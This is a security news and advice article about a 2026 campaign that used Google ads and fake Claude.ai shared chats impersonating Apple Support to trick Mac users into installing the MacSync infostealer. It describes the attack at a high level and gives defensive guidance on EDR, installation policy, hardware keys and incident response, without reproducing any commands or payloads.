Hackers Abuse Google Ads and Claude.ai Chats to Push Mac Malware: What Every Business Needs to Know

Photo by Tech Daily on Unsplash

Key Takeaways

• Attackers created fake Claude.ai shared chats impersonating Apple Support to trick Mac users into pasting Terminal commands that silently install the MacSync infostealer malware.
• Google-sponsored ads for queries like "Claude mac download" pointed to the legitimate claude.ai domain, bypassing Google's verification systems and fooling even security-savvy users.
• MacSync targets 13 Chromium browsers, 4 Gecko browsers, over 80 crypto wallet extensions, macOS Keychain, and Telegram — making it one of the most comprehensive credential-theft tools seen on Mac.
• One malicious shared chat page reached approximately 21,000 visits before Anthropic removed it — roughly 16 hours after the initial security report.

What Happened

On May 10, 2026, Berk Albayrak, a security engineer at Trendyol Group, uncovered a novel attack campaign that weaponized two of the most trusted names in tech: Google and Anthropic's Claude.ai. Here is how the attack worked in plain terms.

Users searching Google for phrases like "Claude mac download" encountered sponsored ads that appeared completely authentic — because the destination URL actually resolved to claude.ai, Anthropic's real website. Clicking through did not take victims to Anthropic's official download page. Instead, it landed them on a malicious Claude.ai shared chat. The shared-chat feature, designed to let users exchange AI conversations publicly, had been quietly hijacked by attackers.

Inside these shared chats, the attackers impersonated Apple Support and presented a polished "Claude Code on Mac" installation guide. Victims were instructed to open Terminal (a command-line interface — essentially a text-based control panel for your Mac) and paste in commands described as necessary for installation. Those commands silently downloaded and executed MacSync, an infostealer malware (software that quietly harvests your credentials and personal data and transmits them to attackers).

Albayrak identified at least two separate malicious chats, each using entirely different infrastructure, domains, and payloads, yet following an identical social engineering structure — clear evidence of a coordinated, professionally operated campaign. Security awareness among Mac users is the first and most critical line of defense against this type of threat, and this attack was specifically designed to defeat it.

Photo by Solen Feyissa on Unsplash

Why It Matters for Your Organization's Security

This attack is alarming not because it breaks new technical ground, but because it systematically dismantles the detection methods most organizations rely on. Understanding each layer helps sharpen your data protection strategy.

The Google ad problem is bigger than one campaign. Bitdefender discovered over 200 malicious Google ads impersonating popular Mac software in early 2026, with threat actors leveraging at least 35 breached Google Ads accounts belonging to law firms, hotels, and other legitimate businesses. When attackers control a real organization's Google Ads account, the ads pass platform verification checks — leaving users with almost no visual signal that something is wrong. Cybersecurity best practices have long included skepticism toward sponsored search results, but even experienced IT professionals can be fooled when the destination domain is genuinely legitimate.

Abusing trusted platforms invalidates standard threat intelligence checks. In this campaign, the Google ad legitimately resolved to claude.ai — Anthropic's actual domain — because the malicious content lived inside Claude's shared-chat feature, not on a spoofed site. Albayrak noted that this approach bypasses typical domain-spoofing detection heuristics (automated checks that flag lookalike URLs such as "c1aude.ai" or "anthropic-download.com"). Threat intelligence teams that rely heavily on domain reputation scoring need to update their models to account for trusted-domain abuse as a distinct attack class.

The "InstallFix" technique is more convincing than anything before it. Push Security researchers named this variant "InstallFix," distinguishing it from classic ClickFix attacks (which trick users into running pasted commands via fake CAPTCHA screens or error dialogs). As Push Security explained: "Traditional ClickFix attacks need to manufacture a reason for the user to run a command with a fake CAPTCHA or error message, but InstallFix doesn't need any of that — the pretext is simply the user wanting to install legit software, making it significantly more convincing." The plausibility of a straightforward software installation guide removes the psychological friction that might otherwise alert a careful user.

The payload is devastatingly thorough. MacSync targets 13 Chromium-based browsers (Chrome, Brave, Edge, and others) and 4 Gecko-based browsers (Firefox and related browsers), exfiltrating cookies, login data, and extension settings. It also targets over 80 cryptocurrency wallet browser extensions, macOS Keychain credentials (Apple's built-in system-level password vault), Telegram desktop data, and standalone crypto wallet applications. MacSync's latest variant evolved into a multistage loader-as-a-service model using code-signed and notarized Swift applications distributed via disk images — significantly raising its evasion capability compared to earlier versions. Data protection for Mac endpoints now explicitly requires defending against signed, notarized malware that macOS itself may trust.

AI tool users are a high-value, high-volume target. Pillar Security documented at least 20 distinct malware campaigns targeting AI and "vibe coding" tools between February and March 2026 alone, with over 15,600 victims publicly documented across those campaigns — nine targeting both Windows and macOS, and seven exclusively targeting macOS. Developers and technical users who work with AI tools tend to have broader system privileges and more sensitive credentials stored in their browsers, making them disproportionately attractive targets. Incident response planning should now explicitly include scenarios involving compromised AI tool installations.

The 16-hour gap between Albayrak's report and Anthropic's removal of a chat page that had already accumulated 21,000 visits underscores a platform-moderation lag that attackers will continue to exploit. Cybersecurity best practices mean not waiting for platforms to catch up — your organization needs its own layered defenses in place before the next campaign launches.

Photo by Theo Eilertsen Photography on Unsplash

The AI Angle

Building on the threat landscape above, it is worth examining how AI-powered security tools are adapting to detect trusted-platform abuse — and where the detection gaps still exist.

Modern threat intelligence platforms like CrowdStrike Falcon and SentinelOne incorporate behavioral analysis that can flag unexpected network connections initiated from Terminal commands, even when the malicious binary is code-signed and notarized. Because MacSync establishes outbound connections to attacker-controlled infrastructure immediately after execution, endpoint detection and response (EDR) tools — security software that monitors device behavior in real time — can catch the data exfiltration attempt even if they miss the initial download stage.

Browser-based security tools such as Malwarebytes Browser Guard can block known malicious domains used by MacSync as command-and-control servers, adding a layer of data protection before stolen credentials ever leave the device. DNS filtering solutions apply threat intelligence feeds at the network level, which is particularly valuable in enterprise environments managing large Mac fleets. Security awareness training platforms are already incorporating Claude.ai impersonation scenarios into phishing simulation libraries — a necessary evolution as AI platforms become primary attack surfaces rather than just tools.

What Should You Do? 3 Action Steps

1. Harden Your Mac Software Installation Workflow

Adopt and enforce a strict policy across your organization: software is installed only from the official developer website or the Mac App Store — never from instructions pasted into Terminal from a chat interface, forum, or ad-linked page. Train every Mac user to treat any chat interface (including Claude.ai, ChatGPT, and similar platforms) as an untrusted source for Terminal commands. Security awareness briefings covering this specific scenario — an AI chat impersonating Apple Support or a software installation guide — should be added to your next all-hands meeting or security onboarding session. Reinforce the policy with endpoint management tools such as Jamf or Mosyle for macOS fleets, which can restrict software installation without IT approval and alert on unauthorized Terminal activity.

2. Deploy Endpoint Detection and Browser-Level Protection on Every Mac

Install a macOS EDR solution that performs behavioral analysis, not just signature-based scanning (which compares files against a known-malware database and misses novel variants). Because MacSync's latest version is code-signed and notarized, traditional antivirus frequently misses it on first execution; behavioral detection of unexpected outbound network connections is your critical safety net. Complement EDR with a browser security extension that enforces threat intelligence-backed domain blocking. For high-risk users — developers, finance team members, and anyone holding cryptocurrency — deploy a YubiKey or other hardware security key for all critical service logins. A hardware security key uses FIDO2 authentication (a cryptographic standard that ties login to a physical device), meaning that even if MacSync exfiltrates every saved browser credential, attackers cannot replay those credentials without the physical key in hand. A hardware security key costs roughly $25–$50 and provides account protection that no password manager alone can replicate.

3. Build an Incident Response Runbook for Malicious Terminal Command Execution

Assume that some users will eventually run a malicious command despite training. Your incident response plan needs a specific playbook for this scenario: (1) immediately isolate the affected Mac from the network by disabling Wi-Fi and unplugging Ethernet to stop active data exfiltration; (2) do not reboot yet — volatile memory may contain forensic evidence; (3) revoke and rotate all credentials stored in the browser and macOS Keychain, prioritizing email, banking, and any services with cryptocurrency or admin access; (4) notify affected SaaS providers and force-expire all active sessions; and (5) preserve system logs before wiping the machine for forensic analysis. Because MacSync targets over 80 cryptocurrency wallet extensions, any user holding crypto assets should treat their wallet as fully compromised and move funds to a new wallet address immediately. Practicing this incident response runbook quarterly ensures data protection procedures are muscle memory when a real breach occurs, not a panicked scramble.

Frequently Asked Questions

How do hackers use Google ads to spread Mac malware without triggering Google's security checks?

In this campaign, attackers exploited the fact that their malicious content lived inside Claude.ai's legitimate shared-chat feature — not on a spoofed or lookalike website. When Google's ad verification system inspected the destination URL, it saw claude.ai (a well-established, trusted domain) and approved the ad. The harmful installation instructions were one click deeper, inside the shared chat page itself. This "trusted-platform abuse" bypasses domain-reputation checks entirely, which is why cybersecurity best practices now include skepticism toward sponsored search results even when the destination URL looks perfectly legitimate. Always navigate directly to software vendors' official websites rather than clicking ads.

How can I tell if a Claude.ai shared chat is a fake Apple Support page trying to install malware?

Anthropic does not provide technical support through Claude.ai shared chats, and Apple never instructs users to install software by pasting commands into Terminal. Any shared chat that claims to be "Apple Support" or presents itself as an official installation guide and asks you to run Terminal commands is fraudulent — regardless of how professional the formatting looks. Legitimate software installation from reputable vendors does not require copying commands from a chat interface. If you encounter a page like this, close it immediately without copying anything to your clipboard, and report it to Anthropic through their official abuse reporting channel. Building this critical evaluation habit is the foundation of security awareness for every Mac user.

What exactly does the MacSync infostealer steal from an infected Mac, and how serious is the damage?

MacSync is exceptionally comprehensive. It exfiltrates saved credentials, cookies, and extension data from 13 Chromium-based browsers (Chrome, Brave, Edge, Opera, and others) and 4 Gecko-based browsers (Firefox, Librewolf, and related browsers). It also harvests data from over 80 cryptocurrency wallet browser extensions, standalone crypto wallet applications, macOS Keychain (Apple's built-in system-level password storage), and Telegram desktop data. Its latest variant runs as code-signed and notarized Swift applications, meaning macOS's own Gatekeeper security feature will not flag it as untrusted. This breadth of data protection exposure means that a single successful infection can compromise every saved password, active browser session, and crypto holding on the device — making rapid credential rotation and wallet migration the most time-sensitive response steps.

How do I protect my business from malware delivered through AI platform shared chats and similar attacks?

A layered approach is most effective. First, deploy an endpoint detection and response (EDR) solution on all company Macs that uses behavioral analysis to flag suspicious outbound network connections triggered by Terminal commands. Second, enforce a formal policy prohibiting software installation based on chat, forum, or ad-linked instructions, and back it up with mobile device management (MDM) controls. Third, issue hardware security keys such as YubiKeys for privileged and high-risk accounts — FIDO2-backed logins cannot be replayed with stolen credentials alone. Fourth, run threat intelligence-informed security awareness training that explicitly covers AI platform impersonation scenarios. Fifth, maintain an incident response runbook for the specific scenario of a user running a malicious Terminal command, so your team can act within minutes rather than hours.

What should I do immediately if I accidentally ran a Terminal command from a suspicious Claude.ai page or website?

Speed is critical — MacSync can begin exfiltrating data within seconds of execution. First, immediately disconnect the Mac from the internet: turn off Wi-Fi and unplug any Ethernet cable to cut off active data transmission. Do not reboot the machine yet, as volatile memory may hold forensic evidence. Contact your IT security team or your incident response provider right away. Begin rotating passwords for all accounts whose credentials were stored in the affected browser or macOS Keychain — prioritize email, banking, admin tools, and any cryptocurrency services. If you hold crypto assets, move them to a brand-new wallet address immediately and treat the old wallet as fully compromised. Document everything you remember about the page and the commands for your incident response report. Acting within the first 15 minutes dramatically limits the attacker's window for data protection breach and account takeover.

Disclaimer: This article is for informational purposes only and does not constitute professional security consulting advice. Always consult with a qualified cybersecurity professional for your specific needs.

Affiliate Disclosure: This post contains affiliate links to Amazon. As an Amazon Associate, we may earn a small commission from qualifying purchases made through these links — at no extra cost to you. This helps support our independent reporting. We only link to products we believe are relevant to the article. Thank you.